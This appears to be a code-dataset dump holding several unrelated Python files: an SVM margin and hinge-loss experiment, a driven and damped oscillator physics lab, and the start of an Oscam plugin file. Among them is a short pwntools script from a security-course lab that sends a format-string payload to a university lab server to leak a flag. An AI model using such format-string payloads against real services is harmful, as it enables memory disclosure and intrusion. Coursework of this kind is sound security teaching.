cost_training.append(cost_train)
cost_test = 1/2 * np.dot(w, w) + C * hinge_loss_test
cost_testing.append(cost_test)
# alpha=clf.dual_coef_
# alphas.append(alpha)
# ξ=y_train*clf.decision_function(X_train)
# ξs.append(ξ)
a = -w[0] / w[1]
M = 2 / np.sqrt(np.sum(w ** 2))
Margin.append(M)
lst.append([i, C, M, hinge_loss_train, cost_train, hinge_loss_test,
cost_test])
comp_list = []
df = pd.DataFrame(lst, columns=cols)
for i in range(iteration_num):
temp_df = df[df['iteration'] == i]
temp_ar = temp_df.to_numpy()
comp_list.append(temp_ar)
del comp_list[0]
array_sum = comp_list[0] + comp_list[1]
for i in range(len(comp_list)-2):
array_sum = array_sum + comp_list[i+2]
averaged_data = array_sum/len(comp_list)
# plotting the average
fig, ax = plt.subplots()
ax.plot(averaged_data[:, 2], averaged_data[:, 5])
ax.set(xlabel='C values', ylabel='test cost',
title='test')
ax.grid()
df.to_excel(r'dataset_one.xlsx', index=False, header=True)
# %%
# fit the model and get the separating hyperplane
clf = svm.SVC(kernel='linear', C=1.0)
clf.fit(X_s, y)
# fit the model and get the separating hyperplane using weighted classes
wclf = svm.SVC(kernel='linear', class_weight={1: 10})
wclf.fit(X_s, y)
fig, ax = plt.subplots()
# plot the samples
ax.scatter(X_s[:, 0], X_s[:, 1], c=y, cmap=plt.cm.Paired, edgecolors='k')
# plot the decision functions for both classifiers
ax = plt.gca()
xlim = ax.get_xlim()
ylim = ax.get_ylim()
# create grid to evaluate model
xx = np.linspace(xlim[0], xlim[1], 30)
yy = np.linspace(ylim[0], ylim[1], 30)
YY, XX = np.meshgrid(yy, xx)
xy = np.vstack([XX.ravel(), YY.ravel()]).T
# get the separating hyperplane
Z = clf.decision_function(xy).reshape(XX.shape)
# plot decision boundary and margins
a = ax.contour(XX, YY, Z, colors='k', levels=[0], alpha=0.5, linestyles=['-'])
# get the separating hyperplane for weighted classes
Z = wclf.decision_function(xy).reshape(XX.shape)
# plot decision boundary and margins for weighted classes
b = ax.contour(XX, YY, Z, colors='r', levels=[0], alpha=0.5, linestyles=['-'])
plt.legend([a.collections[0], b.collections[0]], ["non weighted", "weighted"],
loc="upper right")
plt.show()
| 29.336343 | 80 | 0.623115 | # -*- coding: utf-8 -*-
"""
Created on Mon Jan 4 18:45:05 2021.
@author: mahdi
"""
import numpy as np
import matplotlib.pyplot as plt
from sklearn import svm, datasets
from sklearn.datasets import make_blobs
from sklearn.preprocessing import StandardScaler
from sklearn.neighbors import NearestCentroid
import statistics
import math
from scipy import stats
from scipy.stats import linregress
import pandas as pd
from sklearn import metrics
from sklearn.model_selection import train_test_split
from sklearn.metrics import hinge_loss
# %% Functions
def unit_vector(vector):
"""
Compute the unit vector.
Parameters
----------
vector : numpy array
The input vector.
Returns
-------
TYPE : numpy array
The unit vector of the input.
"""
return vector / np.linalg.norm(vector)
def angle_between(v1, v2):
"""
Calculate the angle between two vectors.
Parameters
----------
v1 : numpy array
vector 1.
v2 : numpu array
vector 2.
Returns
-------
TYPE :
The angle between two vectors in raidan.
"""
v1_u = unit_vector(v1)
v2_u = unit_vector(v2)
return np.arccos(np.clip(np.dot(v1_u, v2_u), -1.0, 1.0))
def projection_on_line(c_center_1, c_center_2, original_data):
"""
Calculate the projection of one data points on the line going through \
bothcluster centers.
Parameters
----------
c_center_1 : numpy 1 by 2 array
first center coordinates.
c_center_2 : numpy 1 by 2 array
scond center coordinates.
original_data : numpy n by 2 array
data points.
Returns
-------
projection : numpy array
the coordinates of the points projected on to the line going through\
the line which connects the two centers.
"""
vector_data = original_data - c_center_1
projection_line = c_center_1 - c_center_2
projection = c_center_1 + np.dot(vector_data, projection_line) /\
np.dot(projection_line, projection_line) * projection_line
return projection
def calculate_center(original_data):
"""
Calculate the center of data points for the label.
Parameters
----------
original_data : numpy array
The data points.
Returns
-------
center_co : numpy array
The coordinates of the center point.
"""
avr_vec = np.sum(original_data, axis=0)
center_co = avr_vec/original_data.shape[0]
return center_co
def calculate_pvar(pdata):
"""
Calculate the variance of the data projected on to the line.
Parameters
----------
pdata : numpy array
the coordinates of the data projected on the line
Returns
-------
data_var : numpy array
the variance of the projected data points on the line.
"""
c_center = calculate_center(pdata)
mean_vec = np.full(pdata.shape, c_center)
temp_disvec = pdata - mean_vec
temp_vec = []
for i in range(pdata.shape[0]):
sign_v = np.dot(unit_vector(temp_disvec[1, :]),
unit_vector(temp_disvec[i, :]))
temp_valu = np.sign(sign_v) * np.linalg.norm(temp_disvec[i, :])
temp_vec.append(temp_valu)
# temp_vec = np.linalg.norm(temp_disvec, axis=1)
temp_vec = np.array(temp_vec)
data_var = np.var(temp_vec)
return data_var
def calculate_dvar(pdata):
"""
Calculate the variance of the data based on the distance from central\
point.
Parameters
----------
pdata : numpy array
the coordinates of the data projected on the line
Returns
-------
data_var : numpy array
the variance of the projected data points on the line.
"""
c_center = calculate_center(pdata)
mean_vec = np.full(pdata.shape, c_center)
temp_disvec = pdata - mean_vec
temp_vec = np.linalg.norm(temp_disvec, axis=1)
temp_pvec = np.power(temp_vec, 2)
temp_sum = np.sum(temp_pvec)
data_var = temp_sum / pdata.shape[0]
return data_var
def rotate_data(X_data, y):
"""
Do the rotation to make variance calculation easier.
Parameters
----------
X_data : numpy array
The data points that we want to rotata.
y : numpy array
Labels for X_data.
Returns
-------
X_rotated : numpy array
Rotated numpy array.
"""
X_datap = X_data[y == 1]
X_datan = X_data[y == -1]
center_p = calculate_center(X_datap)
center_n = calculate_center(X_datan)
slope = (center_p[1] - center_n[1])/(center_p[0] - center_n[0])
# slope = (X_data[0, 1] - X_data[1, 1])/(X_data[0, 0] - X_data[1, 0])
angle = (math.atan(slope))
theta = -angle
c, s = np.cos(theta), np.sin(theta)
rotation_mat = np.array(((c, -s), (s, c)))
X_rotated = []
for i in range(X_data.shape[0]):
X_rot = rotation_mat.dot(X_data[i])
X_rotated.append(X_rot)
X_rotated = np.array(X_rotated)
return X_rotated
# %% Generating the data
n_samples_1 = 2000
n_samples_2 = 2000
centers = [[-2, 0.0], [2, 2.0]] # cluster centers
clusters_std = [0.7, 0.7] # cluster std_dev
X, y = make_blobs(n_samples=[n_samples_1, n_samples_2],
centers=centers,
cluster_std=clusters_std,
random_state=0, shuffle=False)
y = np.where(y == 1, 1, -1)
# %% Preprocessing step
scaler = StandardScaler()
# X_s = scaler.fit_transform(X)
X_s = X
X_pos = X_s[y == 1]
X_neg = X_s[y == -1]
center_1 = NearestCentroid()
center_1.fit(X_s, y)
data_centers = center_1.centroids_
c_y = np.array([[1], [-1]])
pos_center = calculate_center(X_pos)
neg_center = calculate_center(X_neg)
print(f'The cluster centers are: {center_1.centroids_}')
# %% calculating S&S for clusters
# Calulate the distance of the centers
distance = np.linalg.norm(data_centers[0, :] - data_centers[1, :])
# First projecting the data on to the line which go through the cetners
X_pro = []
for i in range(X_s.shape[0]):
projected_data = projection_on_line(data_centers[0, :], data_centers[1, :],
X_s[i])
X_pro.append(projected_data)
X_pro = np.array(X_pro)
X_pro_pos = X_pro[y == 1]
X_pro_neg = X_pro[y == -1]
var_x_pos = calculate_pvar(X_pro_pos)
var_x_neg = calculate_pvar(X_pro_neg)
total_var = ((X_pro_pos.shape[0] * var_x_pos) +
(X_pro_neg.shape[0] * var_x_neg)) / (X_pro_pos.shape[0] +
X_pro_neg.shape[0])
sigma = np.sqrt(total_var)
SandS = 20 * np.log10(distance / (6 * sigma))
# Projection of the data on to the X axis
X_rota = rotate_data(X_pro, y)
X_rota_pos = X_rota[y == 1]
X_rota_neg = X_rota[y == -1]
# %% Plotting the data and centeral points
fig, ax = plt.subplots()
ax.scatter(X_s[:, 0], X_s[:, 1], marker="o", s=20,
color=["coral" if y == -1 else "cyan" for y in y])
ax.scatter(data_centers[:, 0], data_centers[:, 1],
color=["lime" if y == 1 else "r" for y in c_y])
# %% plotting the projection on to the line going throught two centers
fig, ax = plt.subplots()
# xmin, xmax = -10, 10
# ax.set_xlim([xmin, xmax])
# ax.set_ylim([xmin, xmax])
# Move left y-axis and bottim x-axis to centre, passing through (0,0)
# ax.spines['left'].set_position('zero')
# ax.spines['bottom'].set_position('zero')
# Eliminate upper and right axes
# ax.spines['right'].set_color('none')
# ax.spines['top'].set_color('none')
# Show ticks in the left and lower axes only
ax.xaxis.set_ticks_position('bottom')
ax.yaxis.set_ticks_position('left')
# make the box square shape
ax.set_aspect('equal')
ax.scatter(X_pro[:, 0], X_pro[:, 1], marker="o", s=20,
color=["r" if y == -1 else "b" for y in y], alpha=0.5)
ax.scatter(X_s[:, 0], X_s[:, 1], alpha=0.5)
start, end = ax.get_xlim()
ax.xaxis.set_ticks(np.arange(start, end, 3.0))
ax.set_title('Projected and datas')
# %% Plotting the rotated data
fig, ax = plt.subplots()
# xmin, xmax = -5, 0
# ax.set_xlim([xmin, xmax])
# ax.set_ylim([xmin, xmax])
# Move left y-axis and bottim x-axis to centre, passing through (0,0)
# ax.spines['left'].set_position('zero')`
# ax.spines['bottom'].set_position('zero')
# Eliminate upper and right axes
# ax.spines['right'].set_color('none')
# ax.spines['top'].set_color('none')
# Show ticks in the left and lower axes only
# ax.xaxis.set_ticks_position('bottom')
# ax.yaxis.set_ticks_position('left')
# make the box square shape
# ax.set_aspect('equal')
ax.scatter(X_rota[:, 0], X_rota[:, 1], marker="o", s=20,
color=["r" if y == -1 else "b" for y in y])
start, end = ax.get_xlim()
ax.xaxis.set_ticks(np.arange(start, end, 3.0))
# %% Ishtiaque approch
# make a dataframe with following columns
cols = ['iteration', 'C', 'Margin', 'Train_hinge_loss', 'cost_training',
'Test_hinge_loss', 'cost_testing']
lst = []
iteration_num = 10
for i in range(1, iteration_num):
X_train, X_test, y_train, y_test = train_test_split(X_s, y, test_size=0.40,
random_state=1)
i = i
Cs = np.logspace(-1, 2, 1000).tolist()
Cs = np.array(Cs)
clf = svm.SVC(kernel='linear', C=Cs)
C = []
Margin = []
train_errors = []
test_errors = []
number_of_misclassified_train_points = []
number_of_misclassified_test_points = []
Train_hinge_loss = []
cost_training = []
Test_hinge_loss = []
cost_testing = []
for C in Cs:
clf.set_params(C=C)
clf.fit(X_train, y_train)
i = i
w = clf.coef_[0]
y_train_predict = clf.predict(X_train)
train_error = metrics.mean_squared_error(y_train, y_train_predict)
train_errors.append(train_error)
misclassified_train = np.where(y_train != y_train_predict)
number_of_misclassified_train_points.append(misclassified_train)
pred_decision_train = clf.decision_function(X_train)
hinge_loss_train = hinge_loss(y_train, pred_decision_train)
Train_hinge_loss.append(hinge_loss_train)
pred_decision_test = clf.decision_function(X_test)
hinge_loss_test = hinge_loss(y_test, pred_decision_test)
Test_hinge_loss.append(hinge_loss_test)
cost_train = 1/2 * np.dot(w, w) + C * hinge_loss_train
cost_training.append(cost_train)
cost_test = 1/2 * np.dot(w, w) + C * hinge_loss_test
cost_testing.append(cost_test)
# alpha=clf.dual_coef_
# alphas.append(alpha)
# ξ=y_train*clf.decision_function(X_train)
# ξs.append(ξ)
a = -w[0] / w[1]
M = 2 / np.sqrt(np.sum(w ** 2))
Margin.append(M)
lst.append([i, C, M, hinge_loss_train, cost_train, hinge_loss_test,
cost_test])
comp_list = []
df = pd.DataFrame(lst, columns=cols)
for i in range(iteration_num):
temp_df = df[df['iteration'] == i]
temp_ar = temp_df.to_numpy()
comp_list.append(temp_ar)
del comp_list[0]
array_sum = comp_list[0] + comp_list[1]
for i in range(len(comp_list)-2):
array_sum = array_sum + comp_list[i+2]
averaged_data = array_sum/len(comp_list)
# plotting the average
fig, ax = plt.subplots()
ax.plot(averaged_data[:, 2], averaged_data[:, 5])
ax.set(xlabel='C values', ylabel='test cost',
title='test')
ax.grid()
df.to_excel(r'dataset_one.xlsx', index=False, header=True)
# %%
# fit the model and get the separating hyperplane
clf = svm.SVC(kernel='linear', C=1.0)
clf.fit(X_s, y)
# fit the model and get the separating hyperplane using weighted classes
wclf = svm.SVC(kernel='linear', class_weight={1: 10})
wclf.fit(X_s, y)
fig, ax = plt.subplots()
# plot the samples
ax.scatter(X_s[:, 0], X_s[:, 1], c=y, cmap=plt.cm.Paired, edgecolors='k')
# plot the decision functions for both classifiers
ax = plt.gca()
xlim = ax.get_xlim()
ylim = ax.get_ylim()
# create grid to evaluate model
xx = np.linspace(xlim[0], xlim[1], 30)
yy = np.linspace(ylim[0], ylim[1], 30)
YY, XX = np.meshgrid(yy, xx)
xy = np.vstack([XX.ravel(), YY.ravel()]).T
# get the separating hyperplane
Z = clf.decision_function(xy).reshape(XX.shape)
# plot decision boundary and margins
a = ax.contour(XX, YY, Z, colors='k', levels=[0], alpha=0.5, linestyles=['-'])
# get the separating hyperplane for weighted classes
Z = wclf.decision_function(xy).reshape(XX.shape)
# plot decision boundary and margins for weighted classes
b = ax.contour(XX, YY, Z, colors='r', levels=[0], alpha=0.5, linestyles=['-'])
plt.legend([a.collections[0], b.collections[0]], ["non weighted", "weighted"],
loc="upper right")
plt.show()
| 0 | 0 | 0 |
86d698c9a546a498b829518be815313ee7a80870 | 8,941 | py | Python | Week 11/Lab_5.py | aash7871/PHYS-3210 | 7820e85259b5fbc2845feaa1068ef12afc13db77 | [
"MIT"
] | null | null | null | Week 11/Lab_5.py | aash7871/PHYS-3210 | 7820e85259b5fbc2845feaa1068ef12afc13db77 | [
"MIT"
] | null | null | null | Week 11/Lab_5.py | aash7871/PHYS-3210 | 7820e85259b5fbc2845feaa1068ef12afc13db77 | [
"MIT"
] | 1 | 2020-01-17T01:58:14.000Z | 2020-01-17T01:58:14.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Oct 29 19:02:02 2019
@author: amandaash
"""
import numpy as np
import matplotlib.pyplot as plt
"""
dt = 0.0001
mass = 1
p_value = 2
k_constant = 100
v_initial = 0
x_initial = 1
t_initial = 0
t_final = 10
static_coeff = 0.45
kinetic_coeff = 0.35
viscous_coeff = 0.6
plt.title('damped oscillator, P = {0}, k = {1}, $\\mu_s$ = {2}, $\\mu_k$ = {3}, b = {4}' .format(p_value, k_constant, static_coeff, kinetic_coeff, viscous_coeff))
x_val,v_val,t_val = harmonic_oscillator_friction_beta(p_value,k_constant,v_initial,x_initial,mass,dt,t_initial,t_final,static_coeff,kinetic_coeff,viscous_coeff)
period, angular_frequency = find_period(v_val, dt)
#print(angular_frequency, angular_frequency*2*m)
plt.plot(x_val, t_val)
plt.xlabel('x[m]')
plt.ylabel('t[s]')
#plt.plot(v_val, t_val)
plt.show()
dt = 0.0001
mass = 1
p_value = 2
k_constant = 1
v_initial = 0
x_initial = 1
t_initial = 0
t_final = 100
F_drive = 10000
frequency_drive = 10
#Large Driving Force:
plt.title('overwhelmed driven oscillator, P = {0}, k = {1}, $F_0$ = {2}, $\\omega$ = {3}'.format(p_value, k_constant, F_drive, frequency_drive))
x_drive, v_drive, t_drive = harmonic_oscillator_drive(p_value,k_constant,v_initial,x_initial,mass,dt,t_initial,t_final,F_drive,frequency_drive)
plt.plot(x_drive, t_drive, '-')
plt.xlabel('x[m]')
plt.ylabel('t[s]')
plt.show()
#beats conditions?: dt = 0.0001, m = 1, p = 2, k = 10, v0 = 0, x0 = 1, t0 = 0, tf = 10, F0 = 10, omega = 1
dt = 0.0001
mass = 1
p_value = 2
k_constant = 10
v_initial = 0
x_initial = 1
t_initial = 0
t_final = 75
F_drive = 10
x_natural, v_natural, t_natural = harmonic_oscillator_friction_beta(p_value,k_constant,v_initial,x_initial,mass,dt,t_initial,t_final,0,0,0)
natural_period, natural_frequency = find_period(v_natural, dt)
print(natural_frequency)
epsilon = 0.1
frequency_drive = natural_frequency + epsilon
x_drive, v_drive, t_drive = harmonic_oscillator_drive(p_value,k_constant,v_initial,x_initial,mass,dt,t_initial,t_final,F_drive,frequency_drive)
plt.figure(figsize = (8,14))
plt.title('beats driven oscillator, P = {0}, k = {1}, $F_0$ = {2}, $\\omega$ = {3}'.format(p_value, k_constant, F_drive, frequency_drive))
plt.plot(x_drive, t_drive, '-')
plt.plot(x_natural, t_natural, '-', alpha = 0.5)
plt.axhline(y = natural_period, color = 'k', label = 'natural frequency')
plt.axhline(y = 1/(0.1/(2*np.pi)), color = 'purple', label = 'beat frequency [1 period]')
plt.xlabel('x[m]')
plt.ylabel('t[s]')
plt.ylim(t_initial, t_final)
plt.legend()
plt.savefig('beats.pdf')
plt.show()
#resonance conditions?: dt = 0.001, m = 1, p = 2, k = 1, v0 = 0, x0 = 1, t0 = 0, tf = 40, F0 = 1, omega = 1
frequency_array = np.arange(natural_frequency/10, 10*natural_frequency, 0.1)
amplitudes = []
for frequency in frequency_array:
x_drive, v_drive, t_drive = harmonic_oscillator_drive(p_value,k_constant,v_initial,x_initial,mass,dt,t_initial,t_final,F_drive,frequency)
max_amp = np.max(x_drive)
amplitudes.append(max_amp)
plt.figure()
plt.plot(frequency_array,amplitudes, '.')
plt.xlabel('$\\omega$')
plt.ylabel('A[m]')
plt.savefig('freqv.maxamp.pdf')
plt.show()
"""
dt = 0.0001
mass = 1
p_value = 2
k_constant = 10
v_initial = 0
x_initial = 1
t_initial = 0
t_final = 20
F_drive = 10
frequency_array = np.arange(natural_frequency/10, 10*natural_frequency, 0.8)
amplitudes = []
for frequency in frequency_array:
x_drive, v_drive, t_drive = harmonic_oscillator_drive_friction(p_value,k_constant,v_initial,x_initial,mass,dt,t_initial,t_final,F_drive,frequency, b)
max_amp = np.max(x_drive)
amplitudes.append(max_amp)
plt.figure()
plt.plot(frequency_array,amplitudes, '.')
plt.xlabel('$\\omega$')
plt.ylabel('A[m]')
plt.savefig('freqv.maxamp_friction_1.pdf')
plt.show()
"""
#non-linear resonance
dt = 0.0001
mass = 1
p_value = 4
k_constant = 10
v_initial = 0
x_initial = 1
t_initial = 0
t_final = 60
F_drive = 1
x_natural, v_natural, t_natural = harmonic_oscillator_friction_beta(p_value,k_constant,v_initial,x_initial,mass,dt,t_initial,t_final,0,0,0)
natural_period, natural_frequency = find_period(v_natural, dt)
x_drive, v_drive, t_drive = harmonic_oscillator_drive(p_value,k_constant,v_initial,x_initial,mass,dt,t_initial,t_final,F_drive,natural_frequency)
plt.figure(figsize = (8,14))
plt.title('beats driven oscillator, P = {0}, k = {1}, $F_0$ = {2}, $\\omega$ = {3}'.format(p_value, k_constant, F_drive, natural_frequency))
plt.plot(x_drive, t_drive, '-')
plt.plot(x_natural, t_natural, '-', alpha = 0.5)
#plt.axhline(y = natural_period, color = 'k', label = 'natural frequency')
#plt.axhline(y = 1/(0.1/(2*np.pi)), color = 'purple', label = 'beat frequency [1 period]')
plt.xlabel('x[m]')
plt.ylabel('t[s]')
plt.ylim(t_initial, t_final)
#plt.legend()
plt.savefig('beats_nonharmonic.pdf')
plt.show()
#effect of friction on amp v. drive frequency:
dt = 0.0001
mass = 1
p_value = 2
k_constant = 10
v_initial = 0
x_initial = 1
t_initial = 0
t_final = 75
F_drive = 10
b = 0.1
frequency_array = np.arange(natural_frequency/10, 10*natural_frequency, 0.1)
amplitudes = []
for frequency in frequency_array:
x_drive, v_drive, t_drive = harmonic_oscillator_drive_friction(p_value,k_constant,v_initial,x_initial,mass,dt,t_initial,t_final,F_drive,frequency, b)
max_amp = np.max(x_drive)
amplitudes.append(max_amp)
plt.figure()
plt.plot(frequency_array,amplitudes, '.')
plt.xlabel('$\\omega$')
plt.ylabel('A[m]')
plt.savefig('freqv.maxamp_friction.pdf')
plt.show()
"""
| 29.411184 | 162 | 0.621071 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Oct 29 19:02:02 2019
@author: amandaash
"""
import numpy as np
import matplotlib.pyplot as plt
def harmonic_oscillator_friction_beta(p,k,v0,x0,m,time_step,t0,tf, mu_s, mu_k, b):
g = 9.81
v = v0
x = x0
x_val = []
v_val = []
time_array = np.arange(t0,tf, time_step)
t_val = []
for n in time_array:
if np.isclose(v,0, atol = 10**-5):
a = (-k/m)*x**(p-1) + (mu_s*g)
if (mu_s*m*g) >= np.abs((k)*x**(p-1)):
print('Static Friction failure, F_f = {0} N, F_spring = {1} N'.format(str((mu_s*m*g)), str(np.abs((k)*x**(p-1)))))
break
else:
t_val.append(n)
x_half = x + (time_step/2)*v
v_half = v + ((time_step/2)*(a))
a_half = (-k/m)*x_half**(p-1) + (mu_s*g)
vf = v + ((time_step)/m)*(a_half)
xf = x + (time_step)*v_half
x_val.append(x)
v_val.append(v)
v = vf
x = xf
else:
#print('False')
a = (-k/m)*x**(p-1) - (mu_k*g*(v/np.abs(v))) - ((b/m)*v)
t_val.append(n)
#first Euler's method to find half step:
x_half = x + (time_step/2)*v
v_half = v + ((time_step/2)*(a))
a_half = (-k/m)*x_half**(p-1) - (mu_k*g*(v_half/np.abs(v_half))) - ((b/m)*v_half)
vf = v + ((time_step)/m)*(a_half)
xf = x + (time_step)*v_half
x_val.append(x)
v_val.append(v)
v = vf
x = xf
return x_val, v_val, t_val
def harmonic_oscillator_drive(p,k,v0,x0,m,time_step,t0,tf, F0, omega, mu_s = 0, mu_k = 0, b = 0):
v = v0
x = x0
x_val = []
v_val = []
time_array = np.arange(t0,tf, time_step)
F_sp = []
for n in time_array:
F_spring = -k*x**(p-1)
F_sp.append(F_spring)
a = ((-k/m)*x**(p-1))+((F0/m)*np.sin(omega*n))
#first Euler's method to find half step:
x_half = x + (time_step/2)*v
v_half = v + ((time_step/2))*a
a_half = ((-k/m)*x_half**(p-1))+((F0/m)*np.sin(omega*(n+(time_step/2))))
vf = v + ((time_step)/m)*(a_half)
xf = x + (time_step)*v_half
x_val.append(x)
v_val.append(v)
v = vf
x = xf
return x_val, v_val, time_array
def harmonic_oscillator_drive_friction(p,k,v0,x0,m,time_step,t0,tf, F0, omega, b ):
v = v0
x = x0
x_val = []
v_val = []
time_array = np.arange(t0,tf, time_step)
for n in time_array:
a = ((-k/m)*x**(p-1))+((F0/m)*np.sin(omega*n)) - ((b/m)*v)
#first Euler's method to find half step:
x_half = x + (time_step/2)*v
v_half = v + ((time_step/2))*a
a_half = ((-k/m)*x_half**(p-1))+((F0/m)*np.sin(omega*(n+(time_step/2))))
vf = v + ((time_step)/m)*(a_half)
xf = x + (time_step)*v_half
x_val.append(x)
v_val.append(v)
v = vf
x = xf
return x_val, v_val, time_array
def find_period(velocity_array, time_step):
for index in range(len(list(velocity_array))):
if index == 0 or index == 1:
continue
elif np.sign(velocity_array[index-1]) != np.sign(velocity_array[index+1]):
return 2*index*time_step, (2*np.pi)/(2*index*time_step)
"""
dt = 0.0001
mass = 1
p_value = 2
k_constant = 100
v_initial = 0
x_initial = 1
t_initial = 0
t_final = 10
static_coeff = 0.45
kinetic_coeff = 0.35
viscous_coeff = 0.6
plt.title('damped oscillator, P = {0}, k = {1}, $\\mu_s$ = {2}, $\\mu_k$ = {3}, b = {4}' .format(p_value, k_constant, static_coeff, kinetic_coeff, viscous_coeff))
x_val,v_val,t_val = harmonic_oscillator_friction_beta(p_value,k_constant,v_initial,x_initial,mass,dt,t_initial,t_final,static_coeff,kinetic_coeff,viscous_coeff)
period, angular_frequency = find_period(v_val, dt)
#print(angular_frequency, angular_frequency*2*m)
plt.plot(x_val, t_val)
plt.xlabel('x[m]')
plt.ylabel('t[s]')
#plt.plot(v_val, t_val)
plt.show()
dt = 0.0001
mass = 1
p_value = 2
k_constant = 1
v_initial = 0
x_initial = 1
t_initial = 0
t_final = 100
F_drive = 10000
frequency_drive = 10
#Large Driving Force:
plt.title('overwhelmed driven oscillator, P = {0}, k = {1}, $F_0$ = {2}, $\\omega$ = {3}'.format(p_value, k_constant, F_drive, frequency_drive))
x_drive, v_drive, t_drive = harmonic_oscillator_drive(p_value,k_constant,v_initial,x_initial,mass,dt,t_initial,t_final,F_drive,frequency_drive)
plt.plot(x_drive, t_drive, '-')
plt.xlabel('x[m]')
plt.ylabel('t[s]')
plt.show()
#beats conditions?: dt = 0.0001, m = 1, p = 2, k = 10, v0 = 0, x0 = 1, t0 = 0, tf = 10, F0 = 10, omega = 1
dt = 0.0001
mass = 1
p_value = 2
k_constant = 10
v_initial = 0
x_initial = 1
t_initial = 0
t_final = 75
F_drive = 10
x_natural, v_natural, t_natural = harmonic_oscillator_friction_beta(p_value,k_constant,v_initial,x_initial,mass,dt,t_initial,t_final,0,0,0)
natural_period, natural_frequency = find_period(v_natural, dt)
print(natural_frequency)
epsilon = 0.1
frequency_drive = natural_frequency + epsilon
x_drive, v_drive, t_drive = harmonic_oscillator_drive(p_value,k_constant,v_initial,x_initial,mass,dt,t_initial,t_final,F_drive,frequency_drive)
plt.figure(figsize = (8,14))
plt.title('beats driven oscillator, P = {0}, k = {1}, $F_0$ = {2}, $\\omega$ = {3}'.format(p_value, k_constant, F_drive, frequency_drive))
plt.plot(x_drive, t_drive, '-')
plt.plot(x_natural, t_natural, '-', alpha = 0.5)
plt.axhline(y = natural_period, color = 'k', label = 'natural frequency')
plt.axhline(y = 1/(0.1/(2*np.pi)), color = 'purple', label = 'beat frequency [1 period]')
plt.xlabel('x[m]')
plt.ylabel('t[s]')
plt.ylim(t_initial, t_final)
plt.legend()
plt.savefig('beats.pdf')
plt.show()
#resonance conditions?: dt = 0.001, m = 1, p = 2, k = 1, v0 = 0, x0 = 1, t0 = 0, tf = 40, F0 = 1, omega = 1
frequency_array = np.arange(natural_frequency/10, 10*natural_frequency, 0.1)
amplitudes = []
for frequency in frequency_array:
x_drive, v_drive, t_drive = harmonic_oscillator_drive(p_value,k_constant,v_initial,x_initial,mass,dt,t_initial,t_final,F_drive,frequency)
max_amp = np.max(x_drive)
amplitudes.append(max_amp)
plt.figure()
plt.plot(frequency_array,amplitudes, '.')
plt.xlabel('$\\omega$')
plt.ylabel('A[m]')
plt.savefig('freqv.maxamp.pdf')
plt.show()
"""
dt = 0.0001
mass = 1
p_value = 2
k_constant = 10
v_initial = 0
x_initial = 1
t_initial = 0
t_final = 20
F_drive = 10
frequency_array = np.arange(natural_frequency/10, 10*natural_frequency, 0.8)
amplitudes = []
for frequency in frequency_array:
x_drive, v_drive, t_drive = harmonic_oscillator_drive_friction(p_value,k_constant,v_initial,x_initial,mass,dt,t_initial,t_final,F_drive,frequency, b)
max_amp = np.max(x_drive)
amplitudes.append(max_amp)
plt.figure()
plt.plot(frequency_array,amplitudes, '.')
plt.xlabel('$\\omega$')
plt.ylabel('A[m]')
plt.savefig('freqv.maxamp_friction_1.pdf')
plt.show()
"""
#non-linear resonance
dt = 0.0001
mass = 1
p_value = 4
k_constant = 10
v_initial = 0
x_initial = 1
t_initial = 0
t_final = 60
F_drive = 1
x_natural, v_natural, t_natural = harmonic_oscillator_friction_beta(p_value,k_constant,v_initial,x_initial,mass,dt,t_initial,t_final,0,0,0)
natural_period, natural_frequency = find_period(v_natural, dt)
x_drive, v_drive, t_drive = harmonic_oscillator_drive(p_value,k_constant,v_initial,x_initial,mass,dt,t_initial,t_final,F_drive,natural_frequency)
plt.figure(figsize = (8,14))
plt.title('beats driven oscillator, P = {0}, k = {1}, $F_0$ = {2}, $\\omega$ = {3}'.format(p_value, k_constant, F_drive, natural_frequency))
plt.plot(x_drive, t_drive, '-')
plt.plot(x_natural, t_natural, '-', alpha = 0.5)
#plt.axhline(y = natural_period, color = 'k', label = 'natural frequency')
#plt.axhline(y = 1/(0.1/(2*np.pi)), color = 'purple', label = 'beat frequency [1 period]')
plt.xlabel('x[m]')
plt.ylabel('t[s]')
plt.ylim(t_initial, t_final)
#plt.legend()
plt.savefig('beats_nonharmonic.pdf')
plt.show()
#effect of friction on amp v. drive frequency:
dt = 0.0001
mass = 1
p_value = 2
k_constant = 10
v_initial = 0
x_initial = 1
t_initial = 0
t_final = 75
F_drive = 10
b = 0.1
frequency_array = np.arange(natural_frequency/10, 10*natural_frequency, 0.1)
amplitudes = []
for frequency in frequency_array:
x_drive, v_drive, t_drive = harmonic_oscillator_drive_friction(p_value,k_constant,v_initial,x_initial,mass,dt,t_initial,t_final,F_drive,frequency, b)
max_amp = np.max(x_drive)
amplitudes.append(max_amp)
plt.figure()
plt.plot(frequency_array,amplitudes, '.')
plt.xlabel('$\\omega$')
plt.ylabel('A[m]')
plt.savefig('freqv.maxamp_friction.pdf')
plt.show()
"""
| 3,353 | 0 | 92 |
4cbf5d37297872ed7437ada33f59af00dbf496c6 | 201 | py | Python | Labs/5/FormatStrings/LocalShortRead/Exploit.py | Opty-MISCE/SS | 2010a7f93fdcaa50f835d827e531dc636abfe299 | [
"MIT"
] | null | null | null | Labs/5/FormatStrings/LocalShortRead/Exploit.py | Opty-MISCE/SS | 2010a7f93fdcaa50f835d827e531dc636abfe299 | [
"MIT"
] | null | null | null | Labs/5/FormatStrings/LocalShortRead/Exploit.py | Opty-MISCE/SS | 2010a7f93fdcaa50f835d827e531dc636abfe299 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
from pwn import *
SERVER = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 10091
POS = 7
s = remote(SERVER, PORT)
s.sendline("%{}$s".format(POS))
print(s.recvuntil("}"))
s.close()
| 15.461538 | 45 | 0.661692 | #!/usr/bin/env python
from pwn import *
SERVER = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 10091
POS = 7
s = remote(SERVER, PORT)
s.sendline("%{}$s".format(POS))
print(s.recvuntil("}"))
s.close()
| 0 | 0 | 0 |
530d719ea9df225dbaff8e8de68097186795f2d1 | 33,600 | py | Python | plugin/OscamStatus.py | rdamas/oscam-skyde-status | 68a34b7c55aa7ffa405cd0fe3c74473ea9f70c67 | [
"MIT"
] | null | null | null | plugin/OscamStatus.py | rdamas/oscam-skyde-status | 68a34b7c55aa7ffa405cd0fe3c74473ea9f70c67 | [
"MIT"
